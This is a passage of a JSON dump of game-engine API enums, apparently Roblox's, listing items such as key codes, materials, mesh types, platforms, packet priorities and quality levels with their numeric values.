numItem","Name":"Menu","tags":[],"Value":319,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Power","tags":[],"Value":320,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Euro","tags":[],"Value":321,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Undo","tags":[],"Value":322,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F1","tags":[],"Value":282,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F2","tags":[],"Value":283,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F3","tags":[],"Value":284,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F4","tags":[],"Value":285,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F5","tags":[],"Value":286,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F6","tags":[],"Value":287,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F7","tags":[],"Value":288,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F8","tags":[],"Value":289,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F9","tags":[],"Value":290,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F10","tags":[],"Value":291,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F11","tags":[],"Value":292,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F12","tags":[],"Value":293,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F13","tags":[],"Value":294,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F14","tags":[],"Value":295,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F15","tags":[],"Value":296,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World0","tags":[],"Value":160,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World1","tags":[],"Value":161,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World2","tags":[],"Value":162,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World3","tags":[],"Value":163,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World4","tags":[],"Value":164,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World5","tags":[],"Value":165,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World6","tags":[],"Value":166,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World7","tags":[],"Value":167,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World8","tags":[],"Value":168,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World9","tags":[],"Value":169,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World10","tags":[],"Value":170,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World11","tags":[],"Value":171,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World12","tags":[],"Value":172,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World13","tags":[],"Value":173,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World14","tags":[],"Value":174,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World15","tags":[],"Value":175,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World16","tags":[],"Value":176,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World17","tags":[],"Value":177,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World18","tags":[],"Value":178,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World19","tags":[],"Value":179,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World20","tags":[],"Value":180,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World21","tags":[],"Value":181,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World22","tags":[],"Value":182,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World23","tags":[],"Value":183,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World24","tags":[],"Value":184,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World25","tags":[],"Value":185,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World26","tags":[],"Value":186,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World27","tags":[],"Value":187,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World28","tags":[],"Value":188,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World29","tags":[],"Value":189,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World30","tags":[],"Value":190,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World31","tags":[],"Value":191,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World32","tags":[],"Value":192,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World33","tags":[],"Value":193,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World34","tags":[],"Value":194,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World35","tags":[],"Value":195,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World36","tags":[],"Value":196,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World37","tags":[],"Value":197,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World38","tags":[],"Value":198,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World39","tags":[],"Value":199,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World40","tags":[],"Value":200,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World41","tags":[],"Value":201,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World42","tags":[],"Value":202,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World43","tags":[],"Value":203,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World44","tags":[],"Value":204,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World45","tags":[],"Value":205,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World46","tags":[],"Value":206,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World47","tags":[],"Value":207,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World48","tags":[],"Value":208,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World49","tags":[],"Value":209,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World50","tags":[],"Value":210,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World51","tags":[],"Value":211,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World52","tags":[],"Value":212,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World53","tags":[],"Value":213,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World54","tags":[],"Value":214,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World55","tags":[],"Value":215,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World56","tags":[],"Value":216,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World57","tags":[],"Value":217,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World58","tags":[],"Value":218,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World59","tags":[],"Value":219,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World60","tags":[],"Value":220,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World61","tags":[],"Value":221,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World62","tags":[],"Value":222,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World63","tags":[],"Value":223,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World64","tags":[],"Value":224,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World65","tags":[],"Value":225,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World66","tags":[],"Value":226,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World67","tags":[],"Value":227,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World68","tags":[],"Value":228,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World69","tags":[],"Value":229,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World70","tags":[],"Value":230,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World71","tags":[],"Value":231,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World72","tags":[],"Value":232,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World73","tags":[],"Value":233,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World74","tags":[],"Value":234,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World75","tags":[],"Value":235,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World76","tags":[],"Value":236,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World77","tags":[],"Value":237,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World78","tags":[],"Value":238,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World79","tags":[],"Value":239,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World80","tags":[],"Value":240,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World81","tags":[],"Value":241,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World82","tags":[],"Value":242,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World83","tags":[],"Value":243,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World84","tags":[],"Value":244,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World85","tags":[],"Value":245,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World86","tags":[],"Value":246,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World87","tags":[],"Value":247,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World88","tags":[],"Value":248,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World89","tags":[],"Value":249,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World90","tags":[],"Value":250,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World91","tags":[],"Value":251,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World92","tags":[],"Value":252,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World93","tags":[],"Value":253,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World94","tags":[],"Value":254,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World95","tags":[],"Value":255,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonX","tags":[],"Value":1000,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonY","tags":[],"Value":1001,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonA","tags":[],"Value":1002,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonB","tags":[],"Value":1003,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonR1","tags":[],"Value":1004,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonL1","tags":[],"Value":1005,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonR2","tags":[],"Value":1006,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonL2","tags":[],"Value":1007,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonR3","tags":[],"Value":1008,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonL3","tags":[],"Value":1009,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonStart","tags":[],"Value":1010,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonSelect","tags":[],"Value":1011,"Enum":"KeyCode"},{"type":"EnumItem","Name":"DPadLeft","tags":[],"Value":1012,"Enum":"KeyCode"},{"type":"EnumItem","Name":"DPadRight","tags":[],"Value":1013,"Enum":"KeyCode"},{"type":"EnumItem","Name":"DPadUp","tags":[],"Value":1014,"Enum":"KeyCode"},{"type":"EnumItem","Name":"DPadDown","tags":[],"Value":1015,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Thumbstick1","tags":[],"Value":1016,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Thumbstick2","tags":[],"Value":1017,"Enum":"KeyCode"},{"type":"Enum","Name":"KeywordFilterType","tags":[]},{"type":"EnumItem","Name":"Include","tags":[],"Value":0,"Enum":"KeywordFilterType"},{"type":"EnumItem","Name":"Exclude","tags":[],"Value":1,"Enum":"KeywordFilterType"},{"type":"Enum","Name":"LeftRight","tags":[]},{"type":"EnumItem","Name":"Left","tags":[],"Value":0,"Enum":"LeftRight"},{"type":"EnumItem","Name":"Center","tags":[],"Value":1,"Enum":"LeftRight"},{"type":"EnumItem","Name":"Right","tags":[],"Value":2,"Enum":"LeftRight"},{"type":"Enum","Name":"LevelOfDetailSetting","tags":[]},{"type":"EnumItem","Name":"High","tags":[],"Value":2,"Enum":"LevelOfDetailSetting"},{"type":"EnumItem","Name":"Medium","tags":[],"Value":1,"Enum":"LevelOfDetailSetting"},{"type":"EnumItem","Name":"Low","tags":[],"Value":0,"Enum":"LevelOfDetailSetting"},{"type":"Enum","Name":"ListenerType","tags":[]},{"type":"EnumItem","Name":"Camera","tags":[],"Value":0,"Enum":"ListenerType"},{"type":"EnumItem","Name":"CFrame","tags":[],"Value":1,"Enum":"ListenerType"},{"type":"EnumItem","Name":"ObjectPosition","tags":[],"Value":2,"Enum":"ListenerType"},{"type":"EnumItem","Name":"ObjectCFrame","tags":[],"Value":3,"Enum":"ListenerType"},{"type":"Enum","Name":"Material","tags":[]},{"type":"EnumItem","Name":"Plastic","tags":[],"Value":256,"Enum":"Material"},{"type":"EnumItem","Name":"Wood","tags":[],"Value":512,"Enum":"Material"},{"type":"EnumItem","Name":"Slate","tags":[],"Value":800,"Enum":"Material"},{"type":"EnumItem","Name":"Concrete","tags":[],"Value":816,"Enum":"Material"},{"type":"EnumItem","Name":"CorrodedMetal","tags":[],"Value":1040,"Enum":"Material"},{"type":"EnumItem","Name":"DiamondPlate","tags":[],"Value":1056,"Enum":"Material"},{"type":"EnumItem","Name":"Foil","tags":[],"Value":1072,"Enum":"Material"},{"type":"EnumItem","Name":"Grass","tags":[],"Value":1280,"Enum":"Material"},{"type":"EnumItem","Name":"Ice","tags":[],"Value":1536,"Enum":"Material"},{"type":"EnumItem","Name":"Marble","tags":[],"Value":784,"Enum":"Material"},{"type":"EnumItem","Name":"Granite","tags":[],"Value":832,"Enum":"Material"},{"type":"EnumItem","Name":"Brick","tags":[],"Value":848,"Enum":"Material"},{"type":"EnumItem","Name":"Pebble","tags":[],"Value":864,"Enum":"Material"},{"type":"EnumItem","Name":"Sand","tags":[],"Value":1296,"Enum":"Material"},{"type":"EnumItem","Name":"Fabric","tags":[],"Value":1312,"Enum":"Material"},{"type":"EnumItem","Name":"SmoothPlastic","tags":[],"Value":272,"Enum":"Material"},{"type":"EnumItem","Name":"Metal","tags":[],"Value":1088,"Enum":"Material"},{"type":"EnumItem","Name":"WoodPlanks","tags":[],"Value":528,"Enum":"Material"},{"type":"EnumItem","Name":"Cobblestone","tags":[],"Value":880,"Enum":"Material"},{"type":"EnumItem","Name":"Air","tags":["notbrowsable"],"Value":1792,"Enum":"Material"},{"type":"EnumItem","Name":"Water","tags":["notbrowsable"],"Value":2048,"Enum":"Material"},{"type":"EnumItem","Name":"Rock","tags":["notbrowsable"],"Value":896,"Enum":"Material"},{"type":"EnumItem","Name":"Glacier","tags":["notbrowsable"],"Value":1552,"Enum":"Material"},{"type":"EnumItem","Name":"Snow","tags":["notbrowsable"],"Value":1328,"Enum":"Material"},{"type":"EnumItem","Name":"Sandstone","tags":["notbrowsable"],"Value":912,"Enum":"Material"},{"type":"EnumItem","Name":"Mud","tags":["notbrowsable"],"Value":1344,"Enum":"Material"},{"type":"EnumItem","Name":"Basalt","tags":["notbrowsable"],"Value":788,"Enum":"Material"},{"type":"EnumItem","Name":"Ground","tags":["notbrowsable"],"Value":1360,"Enum":"Material"},{"type":"EnumItem","Name":"CrackedLava","tags":["notbrowsable"],"Value":804,"Enum":"Material"},{"type":"EnumItem","Name":"Neon","tags":[],"Value":288,"Enum":"Material"},{"type":"EnumItem","Name":"Asphalt","tags":["notbrowsable"],"Value":1376,"Enum":"Material"},{"type":"EnumItem","Name":"LeafyGrass","tags":["notbrowsable"],"Value":1284,"Enum":"Material"},{"type":"EnumItem","Name":"Salt","tags":["notbrowsable"],"Value":1392,"Enum":"Material"},{"type":"EnumItem","Name":"Limestone","tags":["notbrowsable"],"Value":820,"Enum":"Material"},{"type":"EnumItem","Name":"Pavement","tags":["notbrowsable"],"Value":836,"Enum":"Material"},{"type":"Enum","Name":"MembershipType","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":0,"Enum":"MembershipType"},{"type":"EnumItem","Name":"BuildersClub","tags":[],"Value":1,"Enum":"MembershipType"},{"type":"EnumItem","Name":"TurboBuildersClub","tags":[],"Value":2,"Enum":"MembershipType"},{"type":"EnumItem","Name":"OutrageousBuildersClub","tags":[],"Value":3,"Enum":"MembershipType"},{"type":"Enum","Name":"MeshType","tags":[]},{"type":"EnumItem","Name":"Head","tags":[],"Value":0,"Enum":"MeshType"},{"type":"EnumItem","Name":"Torso","tags":[],"Value":1,"Enum":"MeshType"},{"type":"EnumItem","Name":"Wedge","tags":[],"Value":2,"Enum":"MeshType"},{"type":"EnumItem","Name":"Prism","tags":["deprecated"],"Value":7,"Enum":"MeshType"},{"type":"EnumItem","Name":"Pyramid","tags":["deprecated"],"Value":8,"Enum":"MeshType"},{"type":"EnumItem","Name":"ParallelRamp","tags":["deprecated"],"Value":9,"Enum":"MeshType"},{"type":"EnumItem","Name":"RightAngleRamp","tags":["deprecated"],"Value":10,"Enum":"MeshType"},{"type":"EnumItem","Name":"CornerWedge","tags":["deprecated"],"Value":11,"Enum":"MeshType"},{"type":"EnumItem","Name":"Brick","tags":[],"Value":6,"Enum":"MeshType"},{"type":"EnumItem","Name":"Sphere","tags":[],"Value":3,"Enum":"MeshType"},{"type":"EnumItem","Name":"Cylinder","tags":[],"Value":4,"Enum":"MeshType"},{"type":"EnumItem","Name":"FileMesh","tags":[],"Value":5,"Enum":"MeshType"},{"type":"Enum","Name":"MessageType","tags":[]},{"type":"EnumItem","Name":"MessageOutput","tags":[],"Value":0,"Enum":"MessageType"},{"type":"EnumItem","Name":"MessageInfo","tags":[],"Value":1,"Enum":"MessageType"},{"type":"EnumItem","Name":"MessageWarning","tags":[],"Value":2,"Enum":"MessageType"},{"type":"EnumItem","Name":"MessageError","tags":[],"Value":3,"Enum":"MessageType"},{"type":"Enum","Name":"MouseBehavior","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"MouseBehavior"},{"type":"EnumItem","Name":"LockCenter","tags":[],"Value":1,"Enum":"MouseBehavior"},{"type":"EnumItem","Name":"LockCurrentPosition","tags":[],"Value":2,"Enum":"MouseBehavior"},{"type":"Enum","Name":"MoveState","tags":[]},{"type":"EnumItem","Name":"Stopped","tags":[],"Value":0,"Enum":"MoveState"},{"type":"EnumItem","Name":"Coasting","tags":[],"Value":1,"Enum":"MoveState"},{"type":"EnumItem","Name":"Pushing","tags":[],"Value":2,"Enum":"MoveState"},{"type":"EnumItem","Name":"Stopping","tags":[],"Value":3,"Enum":"MoveState"},{"type":"EnumItem","Name":"AirFree","tags":[],"Value":4,"Enum":"MoveState"},{"type":"Enum","Name":"NameOcclusion","tags":[]},{"type":"EnumItem","Name":"OccludeAll","tags":[],"Value":2,"Enum":"NameOcclusion"},{"type":"EnumItem","Name":"EnemyOcclusion","tags":[],"Value":1,"Enum":"NameOcclusion"},{"type":"EnumItem","Name":"NoOcclusion","tags":[],"Value":0,"Enum":"NameOcclusion"},{"type":"Enum","Name":"NetworkOwnership","tags":[]},{"type":"EnumItem","Name":"Automatic","tags":[],"Value":0,"Enum":"NetworkOwnership"},{"type":"EnumItem","Name":"Manual","tags":[],"Value":1,"Enum":"NetworkOwnership"},{"type":"Enum","Name":"NormalId","tags":[]},{"type":"EnumItem","Name":"Top","tags":[],"Value":1,"Enum":"NormalId"},{"type":"EnumItem","Name":"Bottom","tags":[],"Value":4,"Enum":"NormalId"},{"type":"EnumItem","Name":"Back","tags":[],"Value":2,"Enum":"NormalId"},{"type":"EnumItem","Name":"Front","tags":[],"Value":5,"Enum":"NormalId"},{"type":"EnumItem","Name":"Right","tags":[],"Value":0,"Enum":"NormalId"},{"type":"EnumItem","Name":"Left","tags":[],"Value":3,"Enum":"NormalId"},{"type":"Enum","Name":"OverrideMouseIconBehavior","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":0,"Enum":"OverrideMouseIconBehavior"},{"type":"EnumItem","Name":"ForceShow","tags":[],"Value":1,"Enum":"OverrideMouseIconBehavior"},{"type":"EnumItem","Name":"ForceHide","tags":[],"Value":2,"Enum":"OverrideMouseIconBehavior"},{"type":"Enum","Name":"PacketPriority","tags":[]},{"type":"EnumItem","Name":"IMMEDIATE_PRIORITY","tags":[],"Value":0,"Enum":"PacketPriority"},{"type":"EnumItem","Name":"HIGH_PRIORITY","tags":[],"Value":1,"Enum":"PacketPriority"},{"type":"EnumItem","Name":"MEDIUM_PRIORITY","tags":[],"Value":2,"Enum":"PacketPriority"},{"type":"EnumItem","Name":"LOW_PRIORITY","tags":[],"Value":3,"Enum":"PacketPriority"},{"type":"Enum","Name":"PacketReliability","tags":[]},{"type":"EnumItem","Name":"UNRELIABLE","tags":[],"Value":0,"Enum":"PacketReliability"},{"type":"EnumItem","Name":"UNRELIABLE_SEQUENCED","tags":[],"Value":1,"Enum":"PacketReliability"},{"type":"EnumItem","Name":"RELIABLE","tags":[],"Value":2,"Enum":"PacketReliability"},{"type":"EnumItem","Name":"RELIABLE_ORDERED","tags":[],"Value":3,"Enum":"PacketReliability"},{"type":"EnumItem","Name":"RELIABLE_SEQUENCED","tags":[],"Value":4,"Enum":"PacketReliability"},{"type":"Enum","Name":"PartType","tags":[]},{"type":"EnumItem","Name":"Ball","tags":[],"Value":0,"Enum":"PartType"},{"type":"EnumItem","Name":"Block","tags":[],"Value":1,"Enum":"PartType"},{"type":"EnumItem","Name":"Cylinder","tags":[],"Value":2,"Enum":"PartType"},{"type":"Enum","Name":"PathStatus","tags":[]},{"type":"EnumItem","Name":"Success","tags":[],"Value":0,"Enum":"PathStatus"},{"type":"EnumItem","Name":"ClosestNoPath","tags":[],"Value":1,"Enum":"PathStatus"},{"type":"EnumItem","Name":"ClosestOutOfRange","tags":[],"Value":2,"Enum":"PathStatus"},{"type":"EnumItem","Name":"FailStartNotEmpty","tags":[],"Value":3,"Enum":"PathStatus"},{"type":"EnumItem","Name":"FailFinishNotEmpty","tags":[],"Value":4,"Enum":"PathStatus"},{"type":"Enum","Name":"PhysicalPropertiesMode","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":1,"Enum":"PhysicalPropertiesMode"},{"type":"EnumItem","Name":"Legacy","tags":[],"Value":0,"Enum":"PhysicalPropertiesMode"},{"type":"EnumItem","Name":"New","tags":[],"Value":2,"Enum":"PhysicalPropertiesMode"},{"type":"Enum","Name":"PhysicsReceiveMethod","tags":[]},{"type":"EnumItem","Name":"Direct","tags":[],"Value":0,"Enum":"PhysicsReceiveMethod"},{"type":"EnumItem","Name":"Interpolation","tags":[],"Value":1,"Enum":"PhysicsReceiveMethod"},{"type":"Enum","Name":"PhysicsSendMethod","tags":[]},{"type":"EnumItem","Name":"ErrorComputation","tags":[],"Value":0,"Enum":"PhysicsSendMethod"},{"type":"EnumItem","Name":"ErrorComputation2","tags":[],"Value":1,"Enum":"PhysicsSendMethod"},{"type":"EnumItem","Name":"RoundRobin","tags":[],"Value":2,"Enum":"PhysicsSendMethod"},{"type":"EnumItem","Name":"TopNErrors","tags":[],"Value":3,"Enum":"PhysicsSendMethod"},{"type":"Enum","Name":"Platform","tags":[]},{"type":"EnumItem","Name":"Windows","tags":[],"Value":0,"Enum":"Platform"},{"type":"EnumItem","Name":"OSX","tags":[],"Value":1,"Enum":"Platform"},{"type":"EnumItem","Name":"IOS","tags":[],"Value":2,"Enum":"Platform"},{"type":"EnumItem","Name":"Android","tags":[],"Value":3,"Enum":"Platform"},{"type":"EnumItem","Name":"XBoxOne","tags":[],"Value":4,"Enum":"Platform"},{"type":"EnumItem","Name":"PS4","tags":[],"Value":5,"Enum":"Platform"},{"type":"EnumItem","Name":"PS3","tags":[],"Value":6,"Enum":"Platform"},{"type":"EnumItem","Name":"XBox360","tags":[],"Value":7,"Enum":"Platform"},{"type":"EnumItem","Name":"WiiU","tags":[],"Value":8,"Enum":"Platform"},{"type":"EnumItem","Name":"NX","tags":[],"Value":9,"Enum":"Platform"},{"type":"EnumItem","Name":"Ouya","tags":[],"Value":10,"Enum":"Platform"},{"type":"EnumItem","Name":"AndroidTV","tags":[],"Value":11,"Enum":"Platform"},{"type":"EnumItem","Name":"Chromecast","tags":[],"Value":12,"Enum":"Platform"},{"type":"EnumItem","Name":"Linux","tags":[],"Value":13,"Enum":"Platform"},{"type":"EnumItem","Name":"SteamOS","tags":[],"Value":14,"Enum":"Platform"},{"type":"EnumItem","Name":"WebOS","tags":[],"Value":15,"Enum":"Platform"},{"type":"EnumItem","Name":"DOS","tags":[],"Value":16,"Enum":"Platform"},{"type":"EnumItem","Name":"BeOS","tags":[],"Value":17,"Enum":"Platform"},{"type":"EnumItem","Name":"UWP","tags":[],"Value":18,"Enum":"Platform"},{"type":"EnumItem","Name":"None","tags":[],"Value":19,"Enum":"Platform"},{"type":"Enum","Name":"PlayerActions","tags":[]},{"type":"EnumItem","Name":"CharacterForward","tags":[],"Value":0,"Enum":"PlayerActions"},{"type":"EnumItem","Name":"CharacterBackward","tags":[],"Value":1,"Enum":"PlayerActions"},{"type":"EnumItem","Name":"CharacterLeft","tags":[],"Value":2,"Enum":"PlayerActions"},{"type":"EnumItem","Name":"CharacterRight","tags":[],"Value":3,"Enum":"PlayerActions"},{"type":"EnumItem","Name":"CharacterJump","tags":[],"Value":4,"Enum":"PlayerActions"},{"type":"Enum","Name":"PlayerChatType","tags":[]},{"type":"EnumItem","Name":"All","tags":[],"Value":0,"Enum":"PlayerChatType"},{"type":"EnumItem","Name":"Team","tags":[],"Value":1,"Enum":"PlayerChatType"},{"type":"EnumItem","Name":"Whisper","tags":[],"Value":2,"Enum":"PlayerChatType"},{"type":"Enum","Name":"PoseEasingDirection","tags":[]},{"type":"EnumItem","Name":"Out","tags":[],"Value":1,"Enum":"PoseEasingDirection"},{"type":"EnumItem","Name":"InOut","tags":[],"Value":2,"Enum":"PoseEasingDirection"},{"type":"EnumItem","Name":"In","tags":[],"Value":0,"Enum":"PoseEasingDirection"},{"type":"Enum","Name":"PoseEasingStyle","tags":[]},{"type":"EnumItem","Name":"Linear","tags":[],"Value":0,"Enum":"PoseEasingStyle"},{"type":"EnumItem","Name":"Constant","tags":[],"Value":1,"Enum":"PoseEasingStyle"},{"type":"EnumItem","Name":"Elastic","tags":[],"Value":2,"Enum":"PoseEasingStyle"},{"type":"EnumItem","Name":"Cubic","tags":[],"Value":3,"Enum":"PoseEasingStyle"},{"type":"EnumItem","Name":"Bounce","tags":[],"Value":4,"Enum":"PoseEasingStyle"},{"type":"Enum","Name":"PriorityMethod","tags":[]},{"type":"EnumItem","Name":"LastError","tags":[],"Value":0,"Enum":"PriorityMethod"},{"type":"EnumItem","Name":"AccumulatedError","tags":[],"Value":1,"Enum":"PriorityMethod"},{"type":"EnumItem","Name":"FIFO","tags":[],"Value":2,"Enum":"PriorityMethod"},{"type":"Enum","Name":"PrismSides","tags":[]},{"type":"EnumItem","Name":"3","tags":[],"Value":3,"Enum":"PrismSides"},{"type":"EnumItem","Name":"5","tags":[],"Value":5,"Enum":"PrismSides"},{"type":"EnumItem","Name":"6","tags":[],"Value":6,"Enum":"PrismSides"},{"type":"EnumItem","Name":"8","tags":[],"Value":8,"Enum":"PrismSides"},{"type":"EnumItem","Name":"10","tags":[],"Value":10,"Enum":"PrismSides"},{"type":"EnumItem","Name":"20","tags":[],"Value":20,"Enum":"PrismSides"},{"type":"Enum","Name":"PrivilegeType","tags":[]},{"type":"EnumItem","Name":"Owner","tags":[],"Value":255,"Enum":"PrivilegeType"},{"type":"EnumItem","Name":"Admin","tags":[],"Value":240,"Enum":"PrivilegeType"},{"type":"EnumItem","Name":"Member","tags":[],"Value":128,"Enum":"PrivilegeType"},{"type":"EnumItem","Name":"Visitor","tags":[],"Value":10,"Enum":"PrivilegeType"},{"type":"EnumItem","Name":"Banned","tags":[],"Value":0,"Enum":"PrivilegeType"},{"type":"Enum","Name":"ProductPurchaseDecision","tags":[]},{"type":"EnumItem","Name":"NotProcessedYet","tags":[],"Value":0,"Enum":"ProductPurchaseDecision"},{"type":"EnumItem","Name":"PurchaseGranted","tags":[],"Value":1,"Enum":"ProductPurchaseDecision"},{"type":"Enum","Name":"PyramidSides","tags":[]},{"type":"EnumItem","Name":"3","tags":[],"Value":3,"Enum":"PyramidSides"},{"type":"EnumItem","Name":"4","tags":[],"Value":4,"Enum":"PyramidSides"},{"type":"EnumItem","Name":"5","tags":[],"Value":5,"Enum":"PyramidSides"},{"type":"EnumItem","Name":"6","tags":[],"Value":6,"Enum":"PyramidSides"},{"type":"EnumItem","Name":"8","tags":[],"Value":8,"Enum":"PyramidSides"},{"type":"EnumItem","Name":"10","tags":[],"Value":10,"Enum":"PyramidSides"},{"type":"EnumItem","Name":"20","tags":[],"Value":20,"Enum":"PyramidSides"},{"type":"Enum","Name":"QualityLevel","tags":[]},{"type":"EnumItem","Name":"Automatic","tags":[],"Value":0,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level01","tags":[],"Value":1,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level02","tags":[],"Value":2,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level03","tags":[],"Value":3,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level04","tags":[],"Value":4,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level05","tags":[],"Value":5,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level06","tags":[],"Value":6,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level07","tags":[],"Value":7,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level08","tags":[],"Value":8,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level09","tags":[],"Value":9,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level10","tags":[],"Value":10,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level11","tags":[],"Value":11,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level12","tags":[],"Value":12,"Enum":"QualityLevel